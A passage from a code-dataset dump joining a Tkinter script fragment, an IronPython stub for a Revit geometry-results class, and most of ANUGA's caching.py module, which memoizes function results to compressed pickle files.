current = main_frame
current.pack()
root.mainloop()
|
release/stubs.min/Autodesk/Revit/DB/__init___parts/SpatialElementGeometryResults.py | htlcnn/ironpython-stubs | 182 | 11195887 | class SpatialElementGeometryResults(object,IDisposable):
""" The results of spatial element geometry calculation. """
def Dispose(self):
""" Dispose(self: SpatialElementGeometryResults) """
pass
def GetBoundaryFaceInfo(self,face):
"""
GetBoundaryFaceInfo(self: SpatialElementGeometryResults,face: Face) -> IList[SpatialElementBoundarySubface]
Query the spatial element boundary face information with the given face.
face: The face from the spatial element's geometry.
Returns: Sub-faces related to the room bounding elements that define the spatial element
face. Returns ll if there is no corresponding boundary information with the
given face.
"""
pass
def GetGeometry(self):
"""
GetGeometry(self: SpatialElementGeometryResults) -> Solid
The solid from the spatial element.
Returns: Requested solid.
"""
pass
def ReleaseUnmanagedResources(self,*args):
""" ReleaseUnmanagedResources(self: SpatialElementGeometryResults,disposing: bool) """
pass
def __enter__(self,*args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self,*args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __repr__(self,*args):
""" __repr__(self: object) -> str """
pass
IsValidObject=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Specifies whether the .NET object represents a valid Revit entity.
Get: IsValidObject(self: SpatialElementGeometryResults) -> bool
"""
|
anuga/caching/caching.py | samcom12/anuga_core | 136 | 11195892 | # =============================================================================
# caching.py - Supervised caching of function results.
# Copyright (C) 1999, 2000, 2001, 2002 <NAME>
# Australian National University (1999-2003)
# Geoscience Australia (2003-present)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License (http://www.gnu.org/copyleft/gpl.html)
# for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
#
#
# Contact address: <EMAIL>
#
# Version 1.5.6 February 2002
# =============================================================================
"""Module caching.py - Supervised caching of function results.
Public functions:
cache(my_F,args) -- Cache values returned from callable object my_F given args.
cachestat() -- Reports statistics about cache hits and time saved.
test() -- Conducts a basic test of the caching functionality.
See doc strings of individual functions for detailed documentation.
"""
from __future__ import division
# -----------------------------------------------------------------------------
# Initialisation code
# Determine platform
#
from builtins import zip
from builtins import input
from builtins import str
from builtins import range
from past.builtins import basestring
from past.utils import old_div
from os import getenv
import collections
import inspect
import types
import time
import sys
import os
if os.name in ['nt', 'dos', 'win32', 'what else?']:
unix = False
else:
unix = True
import anuga.utilities.log as log
from anuga.utilities import system_tools
import numpy as num
#from future
cache_dir = '.python_cache'
# Make default caching directory name
# We are changing the 'data directory' environment variable from
# INUNDATIONHOME to ANUGADATA - this gives a changeover.
if unix:
homedir = getenv('ANUGADATA')
if not homedir:
homedir = getenv('INUNDATIONHOME')
if not homedir:
homedir = '~'
else:
# Since homedir will be a group area, individually label the caches
user = getenv('LOGNAME')
if not user:
cache_dir += '_' + user
CR = '\n'
else:
homedir = 'c:'
CR = '\r\n' #FIXME: Not tested under windows
cachedir = os.path.join(homedir, cache_dir)
# It turns out hashes are no longer stable under Python3 (grr).
# https://stackoverflow.com/questions/27522626/hash-function-in-python-3-3-returns-different-results-between-sessions
# https://stackoverflow.com/questions/30585108/disable-hash-randomization-from-within-python-program
#
# The fix is to use another hashing library.
if system_tools.major_version == 3:
import hashlib
def hash(x):
res = hashlib.sha256(str(x).encode()).hexdigest()
#print('MY:', x, res)
return res
# -----------------------------------------------------------------------------
# Options directory with default values - to be set by user
#
options = {
'cachedir': cachedir, # Default cache directory
'maxfiles': 1000000, # Maximum number of cached files
'savestat': True, # Log caching info to stats file
'verbose': True, # Write messages to standard output
'bin': True, # Use binary format (more efficient)
'compression': True, # Use zlib compression
'bytecode': True, # Recompute if bytecode has changed
'expire': False # Automatically remove files that have been accessed
# least recently
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def set_option(key, value):
"""Function to set values in the options directory.
USAGE:
set_option(key, value)
ARGUMENTS:
key -- Key in options dictionary. (Required)
value -- New value for key. (Required)
DESCRIPTION:
Function to set values in the options directory.
Raises an exception if key is not in options.
"""
if key in options:
options[key] = value
else:
raise KeyError(key) # Key not found, raise an exception
# -----------------------------------------------------------------------------
# Function cache - the main routine
def cache(my_F,
args=(),
kwargs={},
dependencies=None,
cachedir=None,
verbose=None,
compression=None,
evaluate=False,
test=False,
clear=False,
return_filename=False):
"""Supervised caching of function results. Also known as memoization.
USAGE:
result = cache(my_F, args, kwargs, dependencies, cachedir, verbose,
compression, evaluate, test, return_filename)
ARGUMENTS:
my_F -- Callable object (Required)
args -- Arguments to my_F (Default: ())
kwargs -- Keyword arguments to my_F (Default: {})
dependencies -- Filenames that my_F depends on (Default: None)
cachedir -- Directory for cache files (Default: options['cachedir'])
verbose -- Flag verbose output to stdout
(Default: options['verbose'])
compression -- Flag zlib compression (Default: options['compression'])
evaluate -- Flag forced evaluation of my_F (Default: False)
test -- Flag test for cached results (Default: False)
clear -- Flag delete cached results (Default: False)
return_filename -- Flag return of cache filename (Default: False)
DESCRIPTION:
A Python function call of the form
result = my_F(arg1,...,argn)
can be replaced by
from caching import cache
result = cache(my_F,(arg1,...,argn))
The latter form returns the same output as the former but reuses cached
results if the function has been computed previously in the same context.
'result' and the arguments can be simple types, tuples, list, dictionaries or
objects, but not unhashable types such as functions or open file objects.
The function 'my_F' may be a member function of an object or a module.
This type of caching is particularly useful for computationally intensive
functions with few frequently used combinations of input arguments. Note that
if the inputs or output are very large caching might not save time because
disc access may dominate the execution time.
If the function definition changes after a result has been cached it will be
detected by examining the functions bytecode (co_code, co_consts,
func_defaults, co_argcount) and it will be recomputed.
LIMITATIONS:
1 Caching uses function(*args, **kwargs) to evaluate and will work
with anything that can be pickled, so any limitation in function(,)
or pickle extends to caching.
2 A function to be cached should not depend on global variables
as wrong results may occur if globals are changed after a result has
been cached.
-----------------------------------------------------------------------------
Additional functionality:
Keyword args
Keyword arguments (kwargs) can be added as a dictionary of keyword: value
pairs, following Python's 'extended call syntax'.
A Python function call of the form
result = my_F(arg1,...,argn, kwarg1=val1,...,kwargm=valm)
is then cached as follows
from caching import cache
result = cache(my_F,(arg1,...,argn), {kwarg1:val1,...,kwargm:valm})
The default value of kwargs is {}
Explicit dependencies:
The call
cache(my_F,(arg1,...,argn), dependencies = <list of filenames>)
Checks the size, creation time and modification time of each listed file.
If any file has changed the function is recomputed and the results stored
again.
Specify caching directory:
The call
cache(my_F,(arg1,...,argn), cachedir = <cachedir>)
designates <cachedir> where cached data are stored. Use ~ to indicate users
home directory - not $HOME. The default is ~/.python_cache on a UNIX
platform and c:/.python_cache on a Win platform.
Silent operation:
The call
cache(my_F,(arg1,...,argn), verbose=False)
suppresses messages to standard output.
Compression:
The call
cache(my_F,(arg1,...,argn), compression=False)
disables compression. (Default: compression=True). If the requested compressed
or uncompressed file is not there, it'll try the other version.
Forced evaluation:
The call
cache(my_F,(arg1,...,argn), evaluate=True)
forces the function to evaluate even though cached data may exist.
Testing for presence of cached result:
The call
cache(my_F,(arg1,...,argn), test=True)
retrieves cached result if it exists, otherwise None. The function will not
be evaluated. If both evaluate and test are switched on, evaluate takes
precedence.
??NOTE: In case of hash collisions, this may return the wrong result as
??it only checks if *a* cached result is present.
# I think this was due to the bytecode option being False for some reason. (23/1/2009).
Obtain cache filenames:
The call
cache(my_F,(arg1,...,argn), return_filename=True)
returns the hashed base filename under which this function and its
arguments would be cached
Clearing cached results:
The call
cache(my_F,'clear')
clears all cached data for 'my_F' and
cache('clear')
clears all cached data.
NOTE: The string 'clear' can be passed an *argument* to my_F using
cache(my_F,('clear',)) or cache(my_F,tuple(['clear'])).
New form of clear:
cache(my_F,(arg1,...,argn), clear=True)
clears cached data for particular combination my_F and args
"""
# Imports and input checks
#
import time, string
if not cachedir:
cachedir = options['cachedir']
if verbose is None: # Do NOT write 'if not verbose:', it could be zero.
verbose = options['verbose']
if compression is None: # Do NOT write 'if not compression:',
# it could be zero.
compression = options['compression']
# Create cache directory if needed
CD = checkdir(cachedir,verbose)
# Handle the case cache('clear')
if isinstance(my_F, basestring):
if my_F.lower() == 'clear':
clear_cache(CD,verbose=verbose)
return
# Handle the case cache(my_F, 'clear')
if isinstance(args, basestring):
if args.lower() == 'clear':
clear_cache(CD,my_F,verbose=verbose)
return
# Force singleton arg into a tuple
if not isinstance(args, tuple):
args = tuple([args])
# Check that kwargs is a dictionary
if not isinstance(kwargs, dict):
raise TypeError
# Hash arguments (and keyword args) to integer
arghash = myhash((args, kwargs))
# Get sizes and timestamps for files listed in dependencies.
# Force singletons into a tuple.
if dependencies and not isinstance(dependencies, (tuple, list)):
dependencies = tuple([dependencies])
deps = get_depstats(dependencies)
# Extract function name from my_F object
funcname = get_funcname(my_F)
# Create cache filename
FN = funcname+'_'+str(arghash)
#print()
#print('FN', FN)
#print('repr(arghash)', repr(arghash))
#print('arghash', arghash)
#print()
if return_filename:
return(FN)
if clear:
for file_type in file_types:
file_name = CD+FN+'_'+file_type
for fn in [file_name, file_name + '.z']:
if os.access(fn, os.F_OK):
if unix:
os.remove(fn)
else:
# FIXME: os.remove doesn't work under windows
os.system('del '+fn)
if verbose is True:
log.critical('MESSAGE (caching): File %s deleted' % fn)
##else:
## log.critical('%s was not accessed' % fn)
return None
#-------------------------------------------------------------------
# Check if previous computation has been cached
if evaluate is True:
Retrieved = None # Force evaluation of my_F regardless of caching status.
reason = 5
else:
T, FN, Retrieved, reason, comptime, loadtime, compressed = \
CacheLookup(CD, FN, my_F,
args, kwargs,
deps,
verbose,
compression,
dependencies)
if not Retrieved:
if test: # Do not attempt to evaluate function
T = None
else: # Evaluate function and save to cache
if verbose is True:
msg1(funcname, args, kwargs,reason)
# Remove expired files automatically
if options['expire']:
DeleteOldFiles(CD,verbose)
# Save args before function is evaluated in case
# they are modified by function
save_args_to_cache(CD,FN,args,kwargs,compression)
# Execute and time function with supplied arguments
t0 = time.time()
T = my_F(*args, **kwargs) # Built-in 'apply' deprecated in Py3K
#comptime = round(time.time()-t0)
comptime = time.time()-t0
if verbose is True:
msg2(funcname,args,kwargs,comptime,reason)
# Save results and estimated loading time to cache
loadtime = save_results_to_cache(T, CD, FN, my_F, deps, comptime, \
funcname, dependencies, compression)
if verbose is True:
msg3(loadtime, CD, FN, deps, compression)
compressed = compression
if options['savestat'] and (not test or Retrieved):
##if options['savestat']:
addstatsline(CD,funcname,FN,Retrieved,reason,comptime,loadtime,compressed)
return(T) # Return results in all cases
# -----------------------------------------------------------------------------
def cachestat(sortidx=4, period=-1, showuser=None, cachedir=None):
"""Generate statistics of caching efficiency.
USAGE:
cachestat(sortidx, period, showuser, cachedir)
ARGUMENTS:
sortidx -- Index of field by which lists are (default: 4)
Legal values are
0: 'Name'
1: 'Hits'
2: 'CPU'
3: 'Time Saved'
4: 'Gain(%)'
5: 'Size'
period -- If set to -1 all available caching history is used.
If set 0 only the current month is used (default -1).
showuser -- Flag for additional table showing user statistics
(default: None).
cachedir -- Directory for cache files (default: options['cachedir']).
DESCRIPTION:
Logged caching statistics is converted into summaries of the form
--------------------------------------------------------------------------
Function Name Hits Exec(s) Cache(s) Saved(s) Gain(%) Size
--------------------------------------------------------------------------
"""
__cachestat(sortidx, period, showuser, cachedir)
return
# -----------------------------------------------------------------------------
# Has mostly been moved to proper unit test.
# What remains here includes example of the
# cache statistics form.
def test(cachedir=None, verbose=False, compression=None):
"""Test the functionality of caching.
USAGE:
test(verbose)
ARGUMENTS:
verbose -- Flag whether caching will output its statistics (default=False)
cachedir -- Directory for cache files (Default: options['cachedir'])
compression -- Flag zlib compression (Default: options['compression'])
"""
import string, time
# Initialise
#
#import caching
#reload(caching)
if not cachedir:
cachedir = options['cachedir']
if verbose is None: # Do NOT write 'if not verbose:', it could be zero.
verbose = options['verbose']
if compression is None: # Do NOT write 'if not compression:',
# it could be zero.
compression = options['compression']
else:
try:
set_option('compression', compression)
except:
logtesterror('Set option failed')
try:
import zlib
except:
log.critical()
log.critical('*** Could not find zlib, default to no-compression ***')
log.critical('*** Installing zlib will improve performance of caching ***')
log.critical()
compression = 0
set_option('compression', compression)
log.critical('\nTesting caching module - please stand by\n')
# Define a test function to be cached
#
def f(a,b,c,N,x=0,y='abcdefg'):
"""f(a,b,c,N)
Do something time consuming and produce a complex result.
"""
import string
B = []
for n in range(N):
s = str(n+2.0/(n + 4.0))+'.a'*10
B.append((a,b,c,s,n,x,y))
return(B)
# Check that default cachedir is OK
#
CD = checkdir(cachedir,verbose)
# Make a dependency file
#
try:
DepFN = CD + 'testfile.tmp'
DepFN_wildcard = CD + 'test*.tmp'
Depfile = open(DepFN,'w')
Depfile.write('We are the knights who say NI!')
Depfile.close()
logtestOK('Wrote file %s' %DepFN)
except:
logtesterror('Could not open file %s for writing - check your environment' \
% DepFN)
# Check set_option (and switch stats off
#
try:
set_option('savestat',0)
assert(options['savestat'] == 0)
logtestOK('Set option')
except:
logtesterror('Set option failed')
# Make some test input arguments
#
N = 5000 #Make N fairly small here
a = [1,2]
b = ('Thou shalt count the number three',4)
c = {'Five is right out': 6, (7,8): 9}
x = 3
y = 'holy hand granate'
# Test caching
#
if compression:
comprange = 2
else:
comprange = 1
for comp in range(comprange):
# Evaluate and store
#
try:
T1 = cache(f,(a,b,c,N), {'x':x, 'y':y}, evaluate=1, \
verbose=verbose, compression=comp)
if comp:
logtestOK('Caching evaluation with compression')
else:
logtestOK('Caching evaluation without compression')
except:
if comp:
logtesterror('Caching evaluation with compression failed - try caching.test(compression=0)')
else:
logtesterror('Caching evaluation failed - try caching.test(verbose=1)')
# Retrieve
#
try:
T2 = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=verbose, \
compression=comp)
if comp:
logtestOK('Caching retrieval with compression')
else:
logtestOK('Caching retrieval without compression')
except:
if comp:
logtesterror('Caching retrieval with compression failed - try caching.test(compression=0)')
else:
logtesterror('Caching retrieval failed - try caching.test(verbose=1)')
# Reference result
#
T3 = f(a,b,c,N,x=x,y=y) # Compute without caching
if T1 == T2 and T2 == T3:
if comp:
logtestOK('Basic caching functionality (with compression)')
else:
logtestOK('Basic caching functionality (without compression)')
else:
logtesterror('Cached result does not match computed result')
# Test return_filename
#
try:
FN = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=verbose, \
return_filename=1)
assert(FN[:2] == 'f[')
logtestOK('Return of cache filename')
except:
logtesterror('Return of cache filename failed')
# Test existence of cachefiles
#
try:
(datafile,compressed0) = myopen(CD+FN+'_'+file_types[0],"rb",compression)
(argsfile,compressed1) = myopen(CD+FN+'_'+file_types[1],"rb",compression)
(admfile,compressed2) = myopen(CD+FN+'_'+file_types[2],"rb",compression)
logtestOK('Presence of cache files')
datafile.close()
argsfile.close()
admfile.close()
except:
logtesterror('Expected cache files did not exist')
# Test 'test' function when cache is present
#
try:
#T1 = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=verbose, \
# evaluate=1)
T4 = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=verbose, test=1)
assert(T1 == T4)
logtestOK("Option 'test' when cache file present")
except:
logtesterror("Option 'test' when cache file present failed")
# Test that 'clear' works
#
#try:
# cache(f,'clear',verbose=verbose)
# logtestOK('Clearing of cache files')
#except:
# logtesterror('Clear does not work')
try:
cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=verbose, clear=1)
logtestOK('Clearing of cache files')
except:
logtesterror('Clear does not work')
# Test 'test' function when cache is absent
#
try:
T4 = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=verbose, test=1)
assert(T4 is None)
logtestOK("Option 'test' when cache absent")
except:
logtesterror("Option 'test' when cache absent failed")
# Test dependencies
#
T1 = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=verbose, \
dependencies=DepFN)
T2 = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=verbose, \
dependencies=DepFN)
if T1 == T2:
logtestOK('Basic dependencies functionality')
else:
logtesterror('Dependencies do not work')
# Test basic wildcard dependency
#
T3 = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=verbose, \
dependencies=DepFN_wildcard)
if T1 == T3:
logtestOK('Basic dependencies with wildcard functionality')
else:
logtesterror('Dependencies with wildcards do not work')
# Test that changed timestamp in dependencies triggers recomputation
# Modify dependency file
Depfile = open(DepFN,'a')
Depfile.write('You must cut down the mightiest tree in the forest with <NAME>')
Depfile.close()
T3 = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=verbose, \
dependencies=DepFN, test = 1)
if T3 is None:
logtestOK('Changed dependencies recognised')
else:
logtesterror('Changed dependencies not recognised')
# Test recomputation when dependencies have changed
#
T3 = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=verbose, \
dependencies=DepFN)
if T1 == T3:
logtestOK('Recomputed value with changed dependencies')
else:
logtesterror('Recomputed value with changed dependencies failed')
# Performance test (with statistics)
# Don't really rely on this as it will depend on specific computer.
#
set_option('savestat',1)
N = 20*N #Should be large on fast computers...
tt = time.time()
T1 = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=verbose)
t1 = time.time() - tt
tt = time.time()
T2 = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=verbose)
t2 = time.time() - tt
if T1 == T2:
if t1 > t2:
logtestOK('Performance test: relative time saved = %s pct' \
%str(round(old_div((t1-t2)*100,t1),2)))
else:
logtesterror('Basic caching failed for new problem')
# Test presence of statistics file
#
try:
DIRLIST = os.listdir(CD)
SF = []
for FN in DIRLIST:
if string.find(FN,statsfile) >= 0:
fid = open(CD+FN,'r')
fid.close()
logtestOK('Statistics files present')
except:
logtestOK('Statistics files cannot be opened')
print_header_box('Show sample output of the caching function:')
T2 = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=0)
T2 = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=0)
T2 = cache(f,(a,b,c,N), {'x':x, 'y':y}, verbose=1)
print_header_box('Show sample output of cachestat():')
if unix:
cachestat()
else:
try:
import time
t = time.strptime('2030','%Y')
cachestat()
except:
log.critical('cachestat() does not work here, because it relies on '
'time.strptime() which is unavailable in Windows')
logtestOK('Caching self test completed')
# Test setoption (not yet implemented)
#
#==============================================================================
# Auxiliary functions
#==============================================================================
# Import pickler
# cPickle is used by functions mysave, myload, and compare
#
#import cPickle # 10 to 100 times faster than pickle
#import pickle as pickler
import dill as pickler
#pickler = cPickle
# Local immutable constants
#
comp_level = 1 # Compression level for zlib.
# comp_level = 1 works well.
textwidth1 = 16 # Text width of key fields in report forms.
#textwidth2 = 132 # Maximal width of textual representation of
textwidth2 = 300 # Maximal width of textual representation of
# arguments.
textwidth3 = 16 # Initial width of separation lines. Is modified.
textwidth4 = 50 # Text width in logtestOK()
statsfile = '.cache_stat' # Basefilename for cached statistics.
# It will reside in the chosen cache directory.
file_types = ['Result', # File name extension for cached function results.
'Args', # File name extension for stored function args.
'Admin'] # File name extension for administrative info.
Reason_msg = ['OK', # Verbose reasons for recomputation
'No cached result',
'Dependencies have changed',
'Arguments have changed',
'Bytecode has changed',
'Recomputation was requested by caller',
'Cached file was unreadable']
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def CacheLookup(CD, FN, my_F, args, kwargs, deps, verbose, compression,
dependencies):
"""Determine whether cached result exists and return info.
USAGE:
(T, FN, Retrieved, reason, comptime, loadtime, compressed) = \
CacheLookup(CD, FN, my_F, args, kwargs, deps, verbose, compression, \
dependencies)
INPUT ARGUMENTS:
CD -- Cache Directory
FN -- Suggested cache file name
my_F -- Callable object
args -- Tuple of arguments
kwargs -- Dictionary of keyword arguments
deps -- Dependencies time stamps
verbose -- Flag text output
compression -- Flag zlib compression
dependencies -- Given list of dependencies
OUTPUT ARGUMENTS:
T -- Cached result if present otherwise None
FN -- File name under which new results must be saved
Retrieved -- True if a valid cached result was found
reason -- 0: OK (if Retrieved),
1: No cached result,
2: Dependencies have changed,
3: Arguments have changed
4: Bytecode has changed
5: Recomputation was forced
6: Unreadable file
comptime -- Number of seconds it took to computed cachged result
loadtime -- Number of seconds it took to load cached result
compressed -- Flag (0,1) if cached results were compressed or not
DESCRIPTION:
Determine if cached result exists as follows:
Load in saved arguments and bytecode stored under hashed filename.
If they are identical to current arguments and bytecode and if dependencies
have not changed their time stamp, then return cached result.
Otherwise return filename under which new results should be cached.
Hash collisions are handled recursively by calling CacheLookup again with a
modified filename.
"""
import time, string
# Assess whether cached result exists - compressed or not.
#
if verbose:
log.critical('Caching: looking for cached files %s_{%s,%s,%s}.z'
% (CD+FN, file_types[0], file_types[1], file_types[2]))
(datafile,compressed0) = myopen(CD+FN+'_'+file_types[0],"rb",compression)
(argsfile,compressed1) = myopen(CD+FN+'_'+file_types[1],"rb",compression)
(admfile,compressed2) = myopen(CD+FN+'_'+file_types[2],"rb",compression)
if verbose is True and deps is not None:
log.critical('Caching: Dependencies are %s' % list(deps.keys()))
if not (argsfile and datafile and admfile) or \
not (compressed0 == compressed1 and compressed0 == compressed2):
# Cached result does not exist or files were compressed differently
#
# This will ensure that evaluation will take place unless all files are
# present.
reason = 1
return(None,FN,None,reason,None,None,None) #Recompute using same filename
compressed = compressed0 # Remember if compressed files were actually used
datafile.close()
# Retrieve arguments and adm. info
#
R, reason = myload(argsfile, compressed) # The original arguments
argsfile.close()
if reason > 0:
# Recompute using same filename
return(None, FN, None, reason, None, None, None)
else:
(argsref, kwargsref) = R
R, reason = myload(admfile, compressed)
admfile.close()
if reason > 0:
return(None,FN,None,reason,None,None,None) # Recompute using same filename
depsref = R[0] # Dependency statistics
comptime = R[1] # The computation time
coderef = R[2] # The byte code
funcname = R[3] # The function name
# Check if dependencies have changed
#
if dependencies and not compare(depsref, deps):
if verbose:
log.critical('Dependencies %s have changed - recomputing' % dependencies)
# Don't use cached file - recompute
reason = 2
return(None, FN, None, reason, None, None, None)
# Get bytecode from my_F
#
bytecode = get_bytecode(my_F)
# Check if arguments or bytecode have changed
if compare(argsref, args) and compare(kwargsref, kwargs) and \
(not options['bytecode'] or compare(bytecode, coderef)):
# Arguments and dependencies match. Get cached results
T, loadtime, compressed, reason = load_from_cache(CD, FN, compressed)
if reason > 0:
# Recompute using same FN
return(None, FN, None, reason, None, None, None)
Retrieved = 1
reason = 0
if verbose:
msg4(funcname,args,kwargs,deps,comptime,loadtime,CD,FN,compressed)
if loadtime >= comptime:
log.critical('Caching did not yield any gain.')
log.critical('Consider executing function %s without caching.'
% funcname)
else:
# Non matching arguments or bytecodes signify a hash-collision.
# This is resolved by recursive search of cache filenames
# until either a matching or an unused filename is found.
#
(T, FN, Retrieved, reason, comptime, loadtime, compressed) = \
CacheLookup(CD, FN+'x', my_F, args, kwargs, deps,
verbose, compression, dependencies)
# The real reason is that args or bytecodes have changed.
# Not that the recursive seach has found an unused filename
if not Retrieved:
if not compare(bytecode, coderef):
reason = 4 # Bytecode has changed
else:
reason = 3 # Arguments have changed
# PADARN NOTE 17/12/12: Adding a special case to handle the existence of a
# FitInterpolate object. C Structures are serialised so they can be pickled.
#---------------------------------------------------------------------------
from anuga.fit_interpolate.general_fit_interpolate import FitInterpolate
# Setup for quad_tree extension
#from anuga.utilities import compile
#if compile.can_use_C_extension('quad_tree_ext.c'):
#import quad_tree_ext
#else:
# msg = "C implementation of quad tree extension not avaliable"
# raise Exception(msg)
# Setup for sparse_matrix extension
#from anuga.utilities import compile
#if compile.can_use_C_extension('sparse_matrix_ext.c'):
#else:
# msg = "C implementation of sparse_matrix extension not avaliable"
# raise Exception(msg)
import anuga.utilities.sparse_matrix_ext as sparse_matrix_ext
import anuga.utilities.quad_tree_ext as quad_tree_ext
from anuga.geometry.aabb import AABB
if isinstance(T, FitInterpolate):
if hasattr(T,"D"):
T.D=sparse_matrix_ext.deserialise_dok(T.D)
if hasattr(T,"AtA"):
T.AtA=sparse_matrix_ext.deserialise_dok(T.AtA)
if hasattr(T,"root"):
T.build_quad_tree(verbose=verbose)
#---------------------------------------------------------------------------
return((T, FN, Retrieved, reason, comptime, loadtime, compressed))
# -----------------------------------------------------------------------------
def clear_cache(CD, my_F=None, verbose=None):
"""Clear cache for my_F.
USAGE:
clear(CD, my_F, verbose)
ARGUMENTS:
CD -- Caching directory (required)
my_F -- Function object (default: None)
verbose -- Flag verbose output (default: None)
DESCRIPTION:
If my_F is None, clear everything,
otherwise clear only files pertaining to my_F.
"""
import os, re
if CD[-1] != os.sep:
CD = CD+os.sep
if verbose is None:
verbose = options['verbose']
# FIXME: Windows version needs to be tested
if my_F:
funcname = get_funcname(my_F)
if verbose:
log.critical('Clearing %s' % CD+funcname+'*')
file_names = os.listdir(CD)
for file_name in file_names:
#RE = re.search('^' + funcname,file_name) #Inefficient
#if RE:
if file_name[:len(funcname)] == funcname:
if unix:
os.remove(CD+file_name)
else:
os.system('del '+CD+file_name)
# FIXME: os.remove doesn't work under windows
else:
file_names = os.listdir(CD)
if len(file_names) > 0:
if verbose:
log.critical('Remove the following files:')
for file_name in file_names:
log.critical(' ' + file_name)
A = input('Delete (Y/N)[N] ?')
else:
A = 'Y'
if A == 'Y' or A == 'y':
for file_name in file_names:
if unix:
os.remove(CD+file_name)
else:
os.system('del '+CD+file_name)
# FIXME: os.remove doesn't work under windows
#exitcode=os.system('/bin/rm '+CD+'* 2> /dev/null')
# -----------------------------------------------------------------------------
def DeleteOldFiles(CD,verbose=None):
"""Remove expired files
USAGE:
DeleteOldFiles(CD,verbose=None)
"""
if verbose is None:
verbose = options['verbose']
maxfiles = options['maxfiles']
# FIXME: Windows version
import os
block = 1000 # How many files to delete per invokation
Files = os.listdir(CD)
numfiles = len(Files)
if not unix: return # FIXME: Windows case ?
if numfiles > maxfiles:
delfiles = numfiles-maxfiles+block
if verbose:
log.critical('Deleting %d expired files:' % delfiles)
os.system('ls -lur '+CD+'* | head -' + repr(delfiles)) # List them
os.system('ls -ur '+CD+'* | head -' + repr(delfiles) + ' | xargs /bin/rm')
# Delete them
# FIXME: Replace this with os.listdir and os.remove
# -----------------------------------------------------------------------------
def save_args_to_cache(CD, FN, args, kwargs, compression):
"""Save arguments to cache
USAGE:
save_args_to_cache(CD,FN,args,kwargs,compression)
"""
import time, os, sys
(argsfile, compressed) = myopen(CD+FN+'_'+file_types[1], 'wb', compression)
if argsfile is None:
msg = 'ERROR (caching): Could not open argsfile for writing: %s' %FN
raise IOError(msg)
mysave((args,kwargs),argsfile,compression) # Save args and kwargs to cache
argsfile.close()
# Change access rights if possible
#
#if unix:
# try:
# exitcode=os.system('chmod 666 '+argsfile.name)
# except:
# pass
#else:
# pass # FIXME: Take care of access rights under Windows
return
# -----------------------------------------------------------------------------
def save_results_to_cache(T, CD, FN, my_F, deps, comptime, funcname,
dependencies, compression):
"""Save computed results T and admin info to cache
USAGE:
save_results_to_cache(T, CD, FN, my_F, deps, comptime, funcname,
dependencies, compression)
"""
import time, os, sys
verbose = False
# PADARN NOTE 17/12/12: Adding a special case to handle the existence of a
# FitInterpolate object. C Structures are serialised so they can be pickled.
#---------------------------------------------------------------------------
from anuga.fit_interpolate.general_fit_interpolate import FitInterpolate
import anuga.utilities.quad_tree_ext as quad_tree_ext
import anuga.utilities.sparse_matrix_ext as sparse_matrix_ext
from anuga.geometry.aabb import AABB
if isinstance(T, FitInterpolate):
if hasattr(T,"D"):
T.D=sparse_matrix_ext.serialise_dok(T.D)
if hasattr(T,"AtA"):
T.AtA=sparse_matrix_ext.serialise_dok(T.AtA)
if hasattr(T,"root"):
T.root.root=None
#---------------------------------------------------------------------------
(datafile, compressed1) = myopen(CD+FN+'_'+file_types[0],'wb',compression)
(admfile, compressed2) = myopen(CD+FN+'_'+file_types[2],'wb',compression)
if not datafile:
if verbose:
log.critical('ERROR: Could not open %s' % datafile.name)
raise IOError
if not admfile:
if verbose:
log.critical('ERROR: Could not open %s' % admfile.name)
raise IOError
t0 = time.time()
mysave(T,datafile,compression) # Save data to cache
datafile.close()
#savetime = round(time.time()-t0,2)
savetime = time.time()-t0
bytecode = get_bytecode(my_F) # Get bytecode from function object
admtup = (deps, comptime, bytecode, funcname) # Gather admin info
mysave(admtup,admfile,compression) # Save admin info to cache
admfile.close()
# Change access rights if possible
#
#if unix:
# try:
# exitcode=os.system('chmod 666 '+datafile.name)
# exitcode=os.system('chmod 666 '+admfile.name)
# except:
# pass
#else:
# pass # FIXME: Take care of access rights under Windows
return(savetime)
# -----------------------------------------------------------------------------
def load_from_cache(CD, FN, compression):
"""Load previously cached data from file FN
USAGE:
load_from_cache(CD,FN,compression)
"""
import time
(datafile, compressed) = myopen(CD+FN+'_'+file_types[0],"rb",compression)
t0 = time.time()
T, reason = myload(datafile,compressed)
loadtime = time.time()-t0
datafile.close()
return T, loadtime, compressed, reason
# -----------------------------------------------------------------------------
def myopen(FN, mode, compression=True):
"""Open file FN using given mode
USAGE:
myopen(FN, mode, compression=True)
ARGUMENTS:
FN -- File name to be opened
mode -- Open mode (as in open)
compression -- Flag zlib compression
DESCRIPTION:
if compression
Attempt first to open FN + '.z'
If this fails try to open FN
else do the opposite
Return file handle plus info about whether it was compressed or not.
"""
import string
# Determine if file exists already (if writing was requested)
# This info is only used to determine if access modes should be set
#
if 'w' in mode or 'a' in mode:
try:
